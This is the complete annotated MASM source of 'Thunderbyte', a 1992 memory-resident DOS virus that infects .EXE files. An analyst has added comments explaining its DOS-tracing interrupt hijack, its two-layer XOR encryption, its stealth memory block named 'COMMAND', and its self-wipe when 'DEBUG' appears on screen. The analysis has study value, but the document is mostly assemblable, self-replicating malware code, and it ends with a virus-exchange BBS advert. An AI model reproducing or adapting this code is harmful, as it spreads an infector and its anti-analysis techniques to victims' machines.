;*****************************************************************************;
; ;
; Tunderbyte Virus ;
; ;
; TBSCAN.DAT : DB3F00807609??4D75F9 ;
; ;
;*****************************************************************************;

; ---------------------------------------------------------------------------
; Analyst notes (added on review; the code below is unchanged).
;
; Syntax: MASM/TASM (`segment`/`assume`/`org`, `offset`, `this dword`,
; `dw ?`), not NASM as the page metadata claims.
;
; What the visible code does:
;  * Memory-resident DOS .EXE infector. Installs a copy of itself in a
;    self-owned memory block whose MCB name is set to "COMMAND "
;    (Install / CopyVirus).
;  * Intercepts INT 21h WITHOUT changing the INT 21h vector: it single-steps
;    (TF + INT 1, Trace1/Trace2/Trace3) into the DOS handler located below
;    the first MCB, overwrites the first jmp/jcc/call it finds there with
;    `int 32h`, and points INT 32h at HackJump/HackCall, which run
;    Interrupt21 and then emulate the displaced instruction.
;  * Infects .EXE files on close (AH=3Eh) and watches header writes (AH=40h).
;    Infected files carry 0DEADh in the EXE header checksum field. The
;    appended body is XOR-encrypted in two layers; Decrypt1 and
;    Init/DecryptWord undo them at run time.
;  * Hooks INT 8 (timer tick) with DebugWatch, which scans text video memory
;    for the word "DEBUG" and on a hit un-patches DOS and wipes its own
;    memory image (Alarm).
;  * "Are you there?" call: AX=3031h, BX=0DEADh -> AX=0DEADh
;    (Main / DosVersion).
;
; The TBSCAN.DAT line above looks like a scanner signature: its opcode bytes
; (BD .. 80 76 .. 4D 75 F9) match the hand-encoded Decrypt1 loop below; the
; immediate operands depend on the build and may not equal what this source
; assembles to.
;
; Two places look like defects in the original (flagged inline, not fixed):
;  - Exit restores SS from OldSP rather than OldSS (OldSS is never read).
;  - HackJump's fall-through path for a not-taken 7x conditional jump
;    executes the `0` padding byte as part of a different instruction.
;  - WriteFile reads the header from the caller's DS:0, not from DS:DX.
; ---------------------------------------------------------------------------

virus segment public 'code'
assume cs:virus, ds:virus, es:virus
org 0

VirusStart equ $
VirusSize1 equ (VirusEnd1-$) ; bytes written to infected files
VirusSize2 equ (VirusEnd2-$) ; bytes kept resident (code + data area)

; Layer-1 decryptor, hand-encoded as bytes so the key byte can be patched
; in place at Decrypt1[6] (EncryptZero changes it, Again1 reads it).
; Decodes to:
;   mov  bp,StartEncrypt-Decrypt2      ; number of bytes in layer 1
;   xor  byte ptr [bp+Decrypt2-1],key  ; SS-relative; SS=CS at entry because
;                                      ; CloseFile sets ExeSS=ExeCS
;   dec  bp
;   jnz  <the xor>                     ; walks from StartEncrypt-1 down to Decrypt2
Decrypt1: db 0bdh,StartEncrypt-Decrypt2,0
db 80h,76h,Decrypt2-VirusStart-1,0 ; the trailing 0 is the key byte (Decrypt1[6])
db 4dh,75h,-7
; Layer-2 decryptor. Control flow is driven only by `ret imm16` against the
; four-entry address table at DoAgain-8..DoAgain-2, with SP walking the table
; (no jmp/call), presumably to upset single-step tracers. Per word:
; ax = ciphertext, plaintext = word XOR dx, dx += 2*ax. Again2 in the
; infector is the matching encryptor.
Decrypt2: cli ; interrupts stay off while SP points into the code
mov sp,offset DoAgain-2 ; SP -> `dw Init`
ret -8 ; pop IP (= Init), then SP += 0FFF8h: SP -> `dw DecryptWord`

db 0,0,0,0,'***** THUNDERBYTE *****',0,0,0,0

Init: mov cx,(VirusEnd1-StartEncrypt+1)/2 ; number of words in layer 2
mov dl,byte ptr cs:Decrypt1[6] ; key byte
mov dh,dl ; initial 16-bit key = key byte in both halves
mov si,offset StartEncrypt
NotReady: ret 2 ; pop -> DecryptWord, SP -> `dw NextWord`

DecryptWord: mov ax,ss:[si] ; ciphertext word (SS=CS here)
xor cs:[si],dx
NextWord: add dx,ax ; executed twice per word (see ret -4)
inc si
ret -4 ; 1st: pop -> NextWord, SP -> `dw DoAgain`; 2nd: pop -> DoAgain, SP -> `dw DecryptWord`

dw DecryptWord ; <- SP after `ret -8` and after each second `ret -4`
dw DoAgain
dw NextWord
dw Init ; <- DoAgain-2, popped by `ret -8`
DoAgain: loop NotReady ; falls through into Main when all words are done

StartEncrypt equ $ ; everything from here to VirusEnd1 is layer-2 encrypted on disk

; --- host-side entry (after decryption); also the standalone entry point ----
Main: mov sp,1000h
sti
push ds ; DS/ES (PSP at EXE entry) are restored at Exit
push es
mov ax,03031h ; "are you there?" -- answered by DosVersion if resident
mov bx,0DEADh
int 21h
cmp ax,0DEADh
jne Install ; not resident yet
jmp Exit ; already resident: just run the host

Install: push es
mov ah,52h ; DOS "get list of lists" -> ES:BX
int 21h
mov ax,es:[bx-2] ; segment of the first MCB
mov cs:FirstMCB,ax ; Trace1 also uses it as the upper bound of "DOS code"
pop es
; Walk the MCB chain for a block that (a) owns itself, (b) has exactly the
; size requested below and (c) consists of one repeated byte value -- which
; is what Alarm leaves behind after wiping a previous copy (presumably the
; intent). Such a block is reused instead of allocating a new one.
CheckBlock: mov ds,ax ; DS = MCB
inc ax ; AX = the block's data segment
cmp word ptr ds:[1],ax ; owner == the block itself?
jne NextBlock
cmp word ptr ds:[3],((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h) ; size in paragraphs: image + work buffer
jne NextBlock
push ax
push es
mov cx,VirusSize2
xor di,di
mov es,ax
mov al,es:[di] ; compare every byte of the block with its first byte
cld
repe scasb
pop es
pop ax
je CopyVirus ; all bytes equal -> reuse this block
NextBlock: add ax,ds:[3] ; next MCB = this MCB + 1 + size (AX is already MCB+1)
cmp byte ptr ds:[0],'Z' ; 'Z' marks the last block
jne CheckBlock
; No reusable block: shrink this program's own allocation by the virus size
; (+1 paragraph, presumably for the new block's MCB), then allocate.
mov ah,4ah ; resize to 0FFFFh paragraphs fails and returns the maximum in BX
mov bx,-1
int 21h
mov ah,4ah
sub bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)+1
int 21h
mov ah,48h ; allocate: AX = segment of the new block
mov bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
int 21h
CopyVirus: push cs
pop ds
dec ax
mov es,ax ; ES = the block's MCB
inc ax
mov es:[1],ax ; owner = the block itself, so it is not tied to the host's PSP
mov cx,8
mov si,offset CommandStr ; 'COMMAND ' into MCB bytes 8..15 (the name field)
mov di,cx
cld
rep movsb
mov es,ax ; ES = block data segment
EncryptZero: inc byte ptr ds:Decrypt1[6] ; pick the layer-1 key for this session, skipping 0;
jz EncryptZero ; this is the only place the key changes, so all files infected by one resident copy share it
mov cx,VirusSize2 ; copy code + data (through VirusEnd2) into the block
xor si,si
xor di,di
cld
rep movsb
push es
call ReturnFar ; pushes the next IP; ReturnFar's retf then pops IP and ES, continuing at the same offset in the resident copy

; --- running in the resident copy from here on -----------------------------
xor ax,ax
mov ds,ax ; DS = interrupt vector table
cli
mov ax,offset DebugWatch ; hook INT 8 (timer tick) -> DebugWatch, keep the old vector
xchg ax,ds:[20h]
mov cs:OldInt8o,ax
mov ax,cs
xchg ax,ds:[22h]
mov cs:OldInt8s,ax
sti
push ds:[4] ; save the INT 1 vector (restored at Return4)
push ds:[6]
mov word ptr ds:[4],offset Trace1
mov word ptr ds:[6],cs
; Build on the stack: an IRET frame returning to Return4 (so the DOS
; handler's final IRET lands there), then a fake INT 1 frame -- FLAGS with
; TF set, CS:IP = the INT 21h vector. Falling into Trace1 then behaves as
; if INT 1 had fired at the first instruction of the INT 21h handler, with
; AH=52h as the request being traced.
pushf
push cs
mov ax,offset Return4
push ax
cli
pushf
pop ax
or ax,100h ; TF
push ax
push ds:[86h] ; INT 21h vector segment
push ds:[84h] ; INT 21h vector offset
mov ah,52h
; INT 1 handler for the first step (also entered by fall-through above).
; Frame: [bp+2]=IP, [bp+4]=CS, [bp+6]=FLAGS of the traced instruction.
Trace1: push bp
mov bp,sp
push ax
push ds
push cs
pop ds
mov ax,FirstMCB
cmp [bp+4],ax ; traced CS at/above the first MCB is not DOS kernel code:
jae Return1 ; keep stepping (TF stays set) until execution reaches DOS
mov ax,[bp-2] ; remember AX and SP at the start of the trace (Trace2 checks them)
mov RegAX,ax
mov RegSP,bp
mov ax,[bp+2] ; the handler address, used by Dos for chained calls
mov OldInt21o,ax
mov ax,[bp+4]
mov OldInt21s,ax
xor ax,ax
mov ds,ax
mov word ptr ds:[4],offset Trace2 ; later steps go to Trace2
mov word ptr ds:[6],cs
jmp short Trace3
Return1: jmp short Return3
; INT 1 handler for the following steps: only inspect the instruction while
; AX and SP are still what they were at the start (not inside a nested
; call, request not yet dispatched); otherwise just keep stepping.
Trace2: push bp
mov bp,sp
push ax
push ds
cmp ax,cs:RegAX
jne Return3
cmp bp,cs:RegSP
jne Return3
; Inspect the instruction about to execute at [bp+4]:[bp+2]. A near jmp
; (E9/EB), a jcc (70h..7Fh) or a near call (E8) gets replaced by `int 32h`.
Trace3: push bx
push dx
lds bx,[bp+2] ; DS:BX = traced CS:IP
mov al,[bx] ; opcode byte
mov dx,[bx+1] ; operand word (rel16 for E9/E8)
inc dx ; +1: the emulation later adds to the IP after the 2-byte `int 32h`, but a rel16 instruction is 3 bytes long
cmp al,0e9h
je JumpOpcode
cmp al,0e8h
je CallOpcode
xchg ax,dx ; rel8 forms: DX = sign-extended low operand byte, no +1 (2-byte instruction)
dec ax
cbw
xchg ax,dx
cmp al,0ebh
je JumpOpcode
cmp al,70h
jb Return2 ; anything else: keep tracing
cmp al,7fh
ja Return2
JumpOpcode: push ax
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[0c8h],offset HackJump ; INT 32h -> HackJump
mov word ptr ds:[0cah],cs
jmp short Continue
CallOpcode: push ax
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[0c8h],offset HackCall ; INT 32h -> HackCall
mov word ptr ds:[0cah],cs
Continue: pop ds
pop ax
mov cs:Displacement,dx
mov cs:Opcode,al ; self-modifies the `j?? +3` inside HackJump
mov ax,32cdh ; bytes CD 32 = `int 32h`
xchg ax,[bx] ; overwrite the first two bytes of the DOS instruction
mov cs:SavedCode,ax ; keep the original two bytes
mov cs:HackOffset,bx
mov cs:HackSegment,ds
and word ptr [bp+6],0feffh ; clear TF: tracing ends; the IRET below runs the patched instruction
Return2: pop dx
pop bx
Return3: pop ds
pop ax
pop bp
iret
; Reached when the DOS handler IRETs through the frame built above.
Return4: pop ds:[6] ; restore INT 1 (DS is expected to still be 0 here)
pop ds:[4]
mov cs:Handle,0
; Transfer control to the host: relocate the saved header CS by the load
; segment (PSP+10h) and switch to the host's stack.
Exit: pop es
pop ds
mov ax,ds ; DS = PSP segment saved at Main
add ax,10h ; load segment of the image
add cs:OldCS,ax ; header CS is load-relative
add ax,cs:OldSP ; NOTE(review): adds OldSP, not OldSS -- SS becomes load segment + the host's original SP value. OldSS (filled in by CloseFile) is never read anywhere in this file. Looks like a defect in the original; confirm against the binary.
mov dx,cs:OldSP
cli
mov ss,ax
mov sp,dx
sti
jmp cs:OldEntry

ReturnFar: retf ; used by CopyVirus to jump into the resident copy

; Host entry point and stack, filled in by CloseFile for infected files. The
; defaults (CS=-10h, IP=0) make the standalone build jump to PSP:0, where
; DOS places an INT 20h, i.e. the program just terminates.
OldEntry equ this dword
OldIP dw 0
OldCS dw -10h
OldSP dw 1000h
OldSS dw 0 ; written by CloseFile, never read (see Exit)

HackAddress equ this dword ; where `int 32h` was written inside DOS
HackOffset dw ?
HackSegment dw ?
SavedCode dw ? ; the two original bytes at HackAddress

; INT 32h handler when the displaced DOS instruction was a jmp/jcc.
; Frame after the two pushes: [bp+4]=IP (just past `int 32h`, which is
; also just past the original 2-byte jcc), [bp+6]=CS, [bp+8]=FLAGS.
HackJump: call Interrupt21
push bp ; simulate a conditional or
push ax ; unconditional jump
mov bp,sp
mov ax,[bp+8] ; interrupted FLAGS with TF and IF cleared
and ax,0fcffh
push ax
db 0b8h ; mov ax,???? -> AX = Displacement (target - IP after `int 32h`)
Displacement dw 0
popf ; load the interrupted code's flags so the jcc below decides as the original would
Opcode db 0ebh,3,0 ; j?? +3 -- opcode byte patched by Trace3; skips `xor ax,ax` when taken
; NOTE(review): when the patched instruction is a 7x jcc that is NOT taken,
; execution falls into the `0` pad byte, which decodes together with the
; following `xor ax,ax` bytes as `add r/m8,r8` with a memory operand,
; instead of zeroing AX. The trailing 0 is only required for the E9 rel16
; form. Looks like an encoding slip; verify with a disassembly.
xor ax,ax ; not taken: no IP adjustment
nop
add [bp+4],ax ; taken: IP += displacement
pop ax
pop bp
iret

; INT 32h handler when the displaced DOS instruction was a near call (E8).
; Rewrites the interrupt frame so the IRET lands on the call target with the
; call's return address (IP past the 3-byte call) left on the stack.
HackCall: call Interrupt21
sub sp,2 ; simulate a call -- room for one extra word
push bp
mov bp,sp
push ax
mov ax,[bp+4] ; IP past `int 32h` (+2); one more is past the 3-byte call
inc ax
xchg ax,[bp+8] ; FLAGS slot <- return address; AX = FLAGS
xchg ax,[bp+6] ; CS slot <- FLAGS; AX = CS
xchg ax,[bp+4] ; IP slot <- CS; AX = IP(+2)
add ax,cs:Displacement ; target = IP+2 + rel16+1
mov [bp+2],ax ; new IP slot; frame is now IP,CS,FLAGS,retaddr
pop ax
pop bp
iret

; Seek on handle BX with offset 0 from origin AL (0 start, 1 current, 2 end).
; Returns DX:AX = resulting position, CF on error. Clobbers CX, DX.
Seek: mov ah,42h
xor cx,cx
xor dx,dx

; Call the original DOS INT 21h handler directly (address recorded by Trace1).
Dos: pushf
db 9ah ; call far OldInt21s:OldInt21o
OldInt21o dw ?
OldInt21s dw ?
ret

; AH=30h (get DOS version): the "are you there?" probe. AX=3031h/BX=0DEADh
; is answered with AX=0DEADh straight to the caller; anything else passes.
DosVersion: cmp ax,3031h
jne NotTByte
cmp bx,0DEADh
jne NotTByte
mov ax,0DEADh
add sp,8 ; drop Interrupt21's return address and the INT 32h frame;
iret ; what remains is the program's own INT 21h frame (tracing only patched at the entry stack depth, see RegSP)

; Common INT 21h filter, called from HackJump/HackCall. Temporarily restores
; the original bytes at HackAddress so the chained calls made through Dos do
; not re-enter `int 32h`, and re-patches before returning.
Interrupt21: cmp ah,30h
je DosVersion
push si
push ds
push cs:SavedCode
lds si,cs:HackAddress
pop ds:[si] ; un-patch DOS
pop ds
pop si
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
cmp ah,3eh ; close file
je CloseFile
cmp ah,40h ; write file
je WriteFile
Old21: pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
push si
push ds
lds si,cs:HackAddress
mov word ptr ds:[si],32cdh ; re-patch `int 32h`
pop ds
pop si
NotTByte: ret

; AH=40h: when a program writes something that looks like an .EXE header at
; the start of a file, copy the first 18h bytes into Signature.. and remember
; the handle so CloseFile can infect without re-reading the header.
WriteFile: mov ax,4400h ; IOCTL: get device info for handle BX
call Dos
cmp dl,7fh
ja Error1 ; bit 7 set: character device, ignore
mov al,1
call Seek ; DX:AX = current file position
jc Error1
or dx,dx
jnz Error1
cmp ax,17h
ja Error1 ; only writes starting inside the first 18h bytes
push cs
pop es
mov si,dx ; NOTE(review): DX is 0 here (high word of the position), so [si] below reads the caller's DS:0 rather than its write buffer DS:DX -- the caller's DX was overwritten by Seek. Presumably unintended; confirm.
mov di,offset Signature
add di,ax ; destination = Signature + file position
cmp word ptr [si],"ZM"
jne Error1
cmp word ptr [si+12h],0DEADh ; already marked
je Error1
cmp cx,18h
jb CheckHandle
or ax,ax
jz Ok ; a full header written at offset 0 is accepted from any handle
CheckHandle: cmp bx,cs:Handle ; a partial write only from the handle already tracked
jne Error1
Ok: add cx,ax ; clamp the copy to the 18h-byte header area
cmp cx,18h
jbe CountOk
mov cx,18h
CountOk: sub cx,ax
jbe Error1
cld
rep movsb
mov cs:Handle,bx
Error1: jmp Old21

; AH=3Eh: infect the file being closed if it is an unmarked .EXE whose header
; length fields agree with its real length.
CloseFile: push cs
pop ds
push cs
pop es
mov ax,4400h ; IOCTL: get device info
call Dos
test dl,80h ; character device?
jne Error1
or bx,bx
je Read ; handle 0 must never match an "empty" Handle (0)
cmp cs:Handle,bx
je DoNotRead ; header already captured by WriteFile
Read: xor al,al
call Seek ; to the start
jc Error1
mov ah,3fh ; read the 18h header bytes into Signature..
mov cx,18h
mov dx,offset Signature
call Dos
jc Error1
DoNotRead: mov cs:Handle,0
cmp Signature,"ZM"
jne Error1
cmp ChkSum,0DEADh ; infection marker
je Error1
mov ax,ExeIP ; keep the host's entry point and stack for Exit
mov OldIP,ax
mov ax,ExeCS
mov OldCS,ax
mov ax,ExeSS
mov OldSS,ax
mov ax,ExeSP
mov OldSP,ax
mov al,2
call Seek ; DX:AX = file length
jc Error1
push ax
push dx
mov cx,200h
div cx ; AX = length/512, DX = remainder
cmp PartPage,dx
jne SizeError
add dx,-1 ; AX = ceil(length/512): carry out of DX+(-1) only when DX != 0
adc ax,0
cmp PageCount,ax ; flags survive the two pops below
SizeError: pop dx
pop ax
jne Error2 ; header does not describe the whole file: skip it
add ax,0fh ; round the length up to a paragraph
adc dx,0
and ax,0fff0h
mov cx,dx
mov dx,ax
mov ax,4200h ; seek there (absolute CX:DX)
call Dos
jnc SeekOk
Error2: jmp Old21
SeekOk: mov cx,10h
div cx ; paragraphs from the start of the file
sub ax,HdrSize ; minus the header: load-module-relative segment of the virus
mov ExeCS,ax
mov ExeIP,offset Decrypt1
mov ExeSS,ax ; SS = CS, which Decrypt1's [bp] addressing relies on
mov ExeSP,VirusSize1+400h
cmp MinMem,40h ; ask for at least 40h paragraphs beyond the image
jae MemoryOk
mov MinMem,40h
cmp MaxMem,40h
jae MemoryOk
mov MaxMem,40h
MemoryOk: push ds
push es
mov ax,cs
mov ds,ax
add ax,(VirusSize2+0fh)/10h ; work buffer: the paragraphs after the resident image in the same block
mov es,ax
mov cx,VirusSize1
xor si,si
xor di,di
cld
rep movsb ; copy the code part into the work buffer
mov ds,ax
; Layer 1: single-byte XOR over Decrypt2..StartEncrypt-1, walking backwards
; (mirror of Decrypt1).
mov cx,offset StartEncrypt-Decrypt2
mov dl,byte ptr ds:Decrypt1[6]
mov si,offset StartEncrypt-1
Again1: xor ds:[si],dl
dec si
loop Again1
; Layer 2: word XOR with a running key over StartEncrypt..VirusEnd1
; (mirror of DecryptWord/NextWord): key += 2*ciphertext after each word.
mov cx,(VirusEnd1-StartEncrypt+1)/2
mov dh,dl
mov si,offset StartEncrypt
Again2: xor ds:[si],dx
mov ax,ds:[si]
add dx,ax
inc si
add dx,ax
inc si
loop Again2
mov ah,40h ; append the encrypted image
mov cx,VirusSize1
xor dx,dx
call Dos
pop ds ; (order swapped vs. the pushes; harmless, both held CS)
pop es
jc Error3
mov al,2
call Seek ; new length -> header length fields
jc Error3
mov cx,200h
div cx
mov PartPage,dx
add dx,-1
adc ax,0
mov PageCount,ax
mov ChkSum,0DEADh ; mark as infected
xor al,al
call Seek
jc Error3
mov ah,40h ; rewrite the 18h-byte header
mov cx,18h
mov dx,offset Signature
call Dos
Error3: jmp Old21

Count dw 8 ; scan the screen every 8th timer tick
DebugStr db 'DEBUG'
CommandStr db 'COMMAND ' ; name written into the MCB by CopyVirus

; INT 8 (timer) handler: every 8th tick scan text video memory (B000:0 and
; B800:0, 2000 character cells each) for "DEBUG", folding case with AND 0DFh.
; A hit runs Alarm.
DebugWatch: push ax
push cx
push dx
push si
push di
push ds
push es
dec cs:Count
jnz EndWatch
mov cs:Count,8
mov ax,0b000h
mov ds,ax
mov cx,2 ; two screen segments
push cs
pop es
cld
NextScreen: push cx
mov cx,2000 ; character cells
xor si,si
mov di,offset DebugStr
NextChar1: mov dx,5 ; characters left to match
NextChar2: lodsb ; character byte; `inc si` skips the attribute byte
inc si
and al,0dfh ; fold to upper case
scasb
jne CharOk
dec dx
jnz NextChar2
; "DEBUG" is on screen: un-patch DOS, restore INT 8, erase this copy.
Alarm: pop cx
lds si,cs:HackAddress
cmp byte ptr ds:[si],0cdh ; only while the patch is in place
jne EndWatch
mov ax,cs:SavedCode
mov ds:[si],ax
xor cx,cx
mov ds,cx
mov ax,cs:OldInt8o ; restore INT 8
mov ds:[20h],ax
mov ax,cs:OldInt8s ; AL keeps the low byte of the old segment: it becomes the fill byte below
mov ds:[22h],ax
mov es,cx
push cs
pop ds
mov cx,14 ; copy the 14 bytes from `rep stosb` through the far jmp after EndWatch
mov si,offset EndWatch-2
mov di,4f0h ; ...to 0000:04F0 (BIOS inter-application area), and far-return
push es ; there so the wipe does not execute from the memory it erases
push di
rep movsb
xor di,di
mov cx,VirusSize2
push cs
pop es
retf ; -> `rep stosb` at 0:4F0 fills CS:0..VirusSize2 with AL, then pops and far-jumps to the old INT 8
CharOk: neg dx ; DX = characters matched so far (5 - remaining); CF = 1
add dx,5
sbb di,dx ; rewind DI to DebugStr (matched + 1 back)
sub si,dx ; rewind SI to the cell after the one that started this attempt
sub si,dx
loop NextChar1
ScreenOk: mov ax,ds
add ax,800h ; B000h -> B800h
mov ds,ax
pop cx
loop NextScreen
jmp short EndWatch
rep stosb ; not executed in place: copied to 0:4F0 by Alarm (see above)
EndWatch: pop es
pop ds
pop di
pop si
pop dx
pop cx
pop ax
db 0eah ; jmp far OldInt8s:OldInt8o
OldInt8o dw ?
OldInt8s dw ?

db '***** (C) COPYRIGHT 1992 BY THE WRITER *****'

VirusEnd1 equ $ ; end of the part written to files (VirusSize1)

; Resident-only data (inside VirusSize2, never written to files).
FirstMCB dw ?
RegAX dw ?
RegSP dw ?

Handle dw ? ; handle whose header WriteFile captured; 0 = none
; 18h-byte .EXE header image used by WriteFile/CloseFile (standard field order).
Signature dw ? ; 'MZ'
PartPage dw ? ; bytes in the last 512-byte page
PageCount dw ? ; number of 512-byte pages
ReloCnt dw ?
HdrSize dw ? ; header size in paragraphs
MinMem dw ?
MaxMem dw ?
ExeSS dw ?
ExeSP dw ?
ChkSum dw ? ; 0DEADh once infected
ExeIP dw ?
ExeCS dw ?

VirusEnd2 equ $

virus ends

end Main
;===========================================================================;
;==================> and Remember Don't Forget to Call <===================;
;============> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <============;
;===========================================================================;